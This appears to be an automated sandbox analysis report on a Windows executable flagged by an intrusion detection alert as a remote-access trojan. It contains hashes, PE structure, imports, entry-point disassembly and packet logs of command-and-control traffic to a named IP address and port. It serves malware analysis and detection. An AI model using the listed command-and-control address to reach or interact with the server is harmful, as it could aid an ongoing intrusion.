                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/dynamicclientsidelibs/handlerscripts/v1.min.ACSHASHd7106db242c2b41f88a1b02418bec7e2.js
                                                                                                                      Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();

                                                                                                                      Chrome Cache Entry: 408

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 150177
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):52015
                                                                                                                      Entropy (8bit):7.9952734547685935
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vJhGm+7PUzhQu7xb5fpuSijlAVYYHNkPyJvs:RoA9l7FPRuAVYYHiPyJvs
                                                                                                                      MD5:5F28D22CDF37837FA88F08A2050983AF
                                                                                                                      SHA1:2FC8592FB2E4BE8193919AD56EE8588B24E7C0BE
                                                                                                                      SHA-256:6E207B57EF73C7406D23E2533231E94B58B3C52AC63D208EC6664B152EC5B544
                                                                                                                      SHA-512:DD526C86ACD7D940E54F9F6F848F03A4881DF9E17A067E7231E3D1765D846D0741FAFA8D7C89395B644CB6E0CB71098807411A0F534EA148379D23D31A032104
                                                                                                                      Malicious:false
                                                                                                                      Preview:...........k[.H.0........F._...q.UE7....s..m..%$.I.....q.L.d....g....HyWdDdDdd...+.U....................9...vzvy.....`....C...A.....K.Q-.jqR..a.L........I...q.?...6I.?.a... ........%...d/..s.....Zp.DP{.O^..!.Eq.........^..M.......C.$.&q...Z.....:I..^..y._K..6....Q....h5.n........48..._.. .!N...X'...6.....8.Z..^..}.=At_..=........F.aV/|f.'O8.0..P<...R.{..:..i.R.O..A...............Tu.R..'0..2..Y<..!.-5...~].A..g.G...i.l5....F..,.....}.=L..a..1......._..F....N..L..1...O.0..A......\..Q.....g.}Y..h......?..$....4...L...ZdF..'.....;p.........{.^.v.wA=......Y..\..............?x..s. ...L.!......_'.....d.>....X6>.... ..y.w5...4i......E-.WW..9....5....83-...tgs;vgM.1.((...`l&.....4.j.\.4.:L;T..$w.8..:+M[d:...#*.X....vf.../........(.o........^.x/ZF..h/...3._c.wc..B......`n..\....$...K....z...,y!...W..b.WLEb.....oX.....4%.S$..nZ..H.........l..x......&vD.S.&...l.6 .H.....|>....].u|;..taJ^.0Jk.-fZ...!...[.(..8...7r.o.......Cbi.K...{.M.........)}DJF<.W..

                                                                                                                      Chrome Cache Entry: 409

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (42133)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):138067
                                                                                                                      Entropy (8bit):5.225028044529473
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7nKRZMK/xw/:1f4Hu1I+kw/
                                                                                                                      MD5:B9C3E4320DB870036919F1EE117BDA6E
                                                                                                                      SHA1:29B5A9066B5B1F1FE5AFE7EE986E80A49E86606A
                                                                                                                      SHA-256:A1FE019388875B696EDB373B51A51C0A8E3BAD52CD489617D042C0722BDB1E48
                                                                                                                      SHA-512:A878B55E8C65D880CDF14850BAEE1F82254C797C3284485498368F9128E42DCA46F54D9D92750EEEB547C42CAB9A9823AA9AFAB7D881090EBBFA1135CDD410B6
                                                                                                                      Malicious:false
                                                                                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

                                                                                                                      Chrome Cache Entry: 410

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (584)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6798
                                                                                                                      Entropy (8bit):5.383941368080596
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
                                                                                                                      MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                      SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                      SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                      SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""

                                                                                                                      Chrome Cache Entry: 411

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3385), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3385
                                                                                                                      Entropy (8bit):5.293928956465786
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:W4zB+C3yvyE14QHzsyTz4n/2yx/2ydgC2ZPXOMs9:Wy+C3y6k4QPItzqC2xXOMs9
                                                                                                                      MD5:838B4CF03009164350BEE28EC54B1B28
                                                                                                                      SHA1:7289901F526CD15984F080E40BBF8B8B6098EB73
                                                                                                                      SHA-256:70C7CD74052E7BB3716548F7748B7FBF90C8BB39B0F688495B5D3D8974295A72
                                                                                                                      SHA-512:48763334DD0DE579917B94CC53A7D002AFF1D5EF46D2D4BEA8991B05ACB355CD67A21495751EDCB89DFB0A6AE3F773419DAFF49A6DFE9EA48CC8E80BCBF99BF1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/StickyFeedback/sticky-feedback.css?v=cMfNdAUue7NxZUj3dIt_v5DIuzmw9ohJW109iXQpWnI
                                                                                                                      Preview:.supStickyFeedback{position:fixed;width:100%;bottom:0}.supFeedbackFullTextIsOpen{height:222px}#ocHelp{min-height:75%}#supWrapperToPreventFeedbackFlickering{min-height:59px}.ocSmartFeedbackBegin{height:38px}#supFeedbackWrapper{background-color:#f2f2f2;max-width:none;z-index:10000}#supColumnWrapper{padding:11px 0 10px;border-bottom:1px solid #cecece}#supDisableStickyFeedbackButton{position:absolute;top:0;right:15px;font-size:1.4em;text-decoration:none}html[dir=rtl] #supDisableStickyFeedbackButton{left:15px;right:auto}html[dir=rtl] .ocFeedbackButton{margin:12px 0 0 5px}html[dir=rtl] .ocSmartFeedbackReply{text-align:right}#ocMainContent{min-height:100%}.ocFeedbackButton{min-width:62px;height:28px;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue",Helvetica,Tahoma,"BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:15px;font-weight:normal;color:#313131;display:inline-block;text-align:center;text-decoration:none;border:1px solid transparent;background-color:rgba(0,0

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Entropy (8bit):7.998221661432658
                                                                                                                      TrID:
                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:T1#U52a9#U624b1.0.1.exe
                                                                                                                      File size:38'135'059 bytes
                                                                                                                      MD5:477d3b9ee775c048f96b450dd00ba490
                                                                                                                      SHA1:81f1991882b1bf1cb4b169da6c94b772517ab1eb
                                                                                                                      SHA256:799084320848500fef5673799157b94c1db7b74f9651ffe0af326051973cf490
                                                                                                                      SHA512:f537425e54a310723ba57d77b147af4dda06cc6eef1a51fdd16374e4696089e95dfa6e8a20188fa6167e2504628a3d31bff17dbf7bde5db5442761a271e43c1a
                                                                                                                      SSDEEP:786432:lQLDyaGdLEb0s4mkpLirq7P/aSL7plE7xEh+W:lQLDJl2mkpLsq7naSL1lwxER
                                                                                                                      TLSH:0F87331AF27B7194FD70A4BE41E54D74CA77A216C36D848F82A4320F4F93886EA77B44
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W.../...W.../..1W.../...W...+...W...+...W...+...W...+...W.../...W...W...W..3+...W..3+...W..Rich.W.................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:381ca9998cacbebe

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x14000b310
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x140000000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67659260 [Fri Dec 20 15:50:56 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:2
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:2
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:2
                                                                                                                      Import Hash:0b5552dccd9d0a834cea55c0c8fc05be

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      dec eax
                                                                                                                      sub esp, 28h
                                                                                                                      call 00007F60C4DD5C6Ch
                                                                                                                      dec eax
                                                                                                                      add esp, 28h
                                                                                                                      jmp 00007F60C4DD587Fh
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      dec eax
                                                                                                                      sub esp, 28h
                                                                                                                      call 00007F60C4DD61E4h
                                                                                                                      test eax, eax
                                                                                                                      je 00007F60C4DD5A23h
                                                                                                                      dec eax
                                                                                                                      mov eax, dword ptr [00000030h]
                                                                                                                      dec eax
                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                      jmp 00007F60C4DD5A07h
                                                                                                                      dec eax
                                                                                                                      cmp ecx, eax
                                                                                                                      je 00007F60C4DD5A16h
                                                                                                                      xor eax, eax
                                                                                                                      dec eax
                                                                                                                      cmpxchg dword ptr [0004121Ch], ecx
                                                                                                                      jne 00007F60C4DD59F0h
                                                                                                                      xor al, al
                                                                                                                      dec eax
                                                                                                                      add esp, 28h
                                                                                                                      ret
                                                                                                                      mov al, 01h
                                                                                                                      jmp 00007F60C4DD59F9h
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      inc eax
                                                                                                                      push ebx
                                                                                                                      dec eax
                                                                                                                      sub esp, 20h
                                                                                                                      movzx eax, byte ptr [00041207h]
                                                                                                                      test ecx, ecx
                                                                                                                      mov ebx, 00000001h
                                                                                                                      cmove eax, ebx
                                                                                                                      mov byte ptr [000411F7h], al
                                                                                                                      call 00007F60C4DD5FE3h
                                                                                                                      call 00007F60C4DD7112h
                                                                                                                      test al, al
                                                                                                                      jne 00007F60C4DD5A06h
                                                                                                                      xor al, al
                                                                                                                      jmp 00007F60C4DD5A16h
                                                                                                                      call 00007F60C4DE36F1h
                                                                                                                      test al, al
                                                                                                                      jne 00007F60C4DD5A0Bh
                                                                                                                      xor ecx, ecx
                                                                                                                      call 00007F60C4DD7122h
                                                                                                                      jmp 00007F60C4DD59ECh
                                                                                                                      mov al, bl
                                                                                                                      dec eax
                                                                                                                      add esp, 20h
                                                                                                                      pop ebx
                                                                                                                      ret
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      inc eax
                                                                                                                      push ebx
                                                                                                                      dec eax
                                                                                                                      sub esp, 20h
                                                                                                                      cmp byte ptr [000411BCh], 00000000h
                                                                                                                      mov ebx, ecx
                                                                                                                      jne 00007F60C4DD5A69h
                                                                                                                      cmp ecx, 01h
                                                                                                                      jnbe 00007F60C4DD5A6Ch
                                                                                                                      call 00007F60C4DD614Ah
                                                                                                                      test eax, eax
                                                                                                                      je 00007F60C4DD5A2Ah

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3bd0c0x78.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x153c.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4e0000x20c4.pdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000x758.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x394800x1c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x393400x140.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x418.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x288000x28800443d51fb84559b563832949912f06b00False0.5583465952932098data6.488023200564254IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x2a0000x12b160x12c0003cb905c3f1d41732066c037532cd74cFalse0.51546875data5.824610481275219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x3d0000x103f80xe00afabb66fdcd2825de5909f10c900fca7False0.13309151785714285DOS executable (block device driver \377\3)1.8096886543499544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .pdata0x4e0000x20c40x22007b210ceebebc00c96d1c55c2b456bbb4False0.47794117647058826data5.274096406482418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      _RDATA0x510000x15c0x200c059b775abce97446903f3597b027faeFalse0.384765625data2.808567494642619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x520000x153c0x160060f303f9f424891fa7b1e054893c5a44False0.4366122159090909data5.297323385124905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x540000x7580x80011aaafc72361ec8886a740c3e209ceb3False0.544921875data5.2576643703968475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0x520e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.43150319829424305
                                                                                                                      RT_GROUP_ICON0x52f900x14data1.15
                                                                                                                      RT_MANIFEST0x52fa40x596XML 1.0 document, ASCII text, with CRLF line terminators0.4461538461538462

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                      COMCTL32.dll
                                                                                                                      KERNEL32.dllGetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                      ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                      GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-29T13:40:37.759404+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.4499058.212.101.1951122TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 29, 2024 13:39:01.307701111 CET49675443192.168.2.4173.222.162.32
                                                                                                                      Dec 29, 2024 13:39:14.822765112 CET49672443192.168.2.4173.222.162.32
                                                                                                                      Dec 29, 2024 13:39:14.822812080 CET44349672173.222.162.32192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:12.454529047 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:12.454565048 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:12.454631090 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:12.454827070 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:12.454839945 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:14.190710068 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:14.190953970 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:14.190972090 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:14.191976070 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:14.192028999 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:14.193037033 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:14.193100929 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:14.337965012 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:14.337985039 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:14.524878979 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:18.973639965 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:18.973653078 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:18.973699093 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:18.974034071 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:18.974045038 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:20.750621080 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:20.750917912 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:20.750931025 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:20.751785994 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:20.751847029 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:20.752691031 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:20.752748013 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:20.822021008 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:20.822032928 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:20.926662922 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:40:23.888689041 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:23.888828993 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:23.888966084 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:23.996167898 CET49780443192.168.2.4142.250.181.68
                                                                                                                      Dec 29, 2024 13:40:23.996189117 CET44349780142.250.181.68192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:37.638267994 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:37.759115934 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:37.759207010 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:37.759403944 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:37.880193949 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.374552965 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.374753952 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:39.495624065 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.495632887 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.495640993 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928647041 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928684950 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928699970 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928721905 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:39.928833961 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928844929 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928854942 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928864956 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.928869963 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:39.928884983 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:39.929075003 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.929086924 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.929096937 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:39.929116964 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:39.929142952 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:39.937073946 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.049685001 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.049750090 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.148812056 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.148900986 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.148952961 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.151362896 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.151443005 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.153728008 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.159810066 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.159945965 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.160000086 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.168237925 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.168365002 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.168428898 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.176753998 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.176856041 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.176929951 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.185185909 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.185296059 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.185348034 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.193676949 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.193794966 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.193850994 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.202147961 CET1122499058.212.101.195192.168.2.4
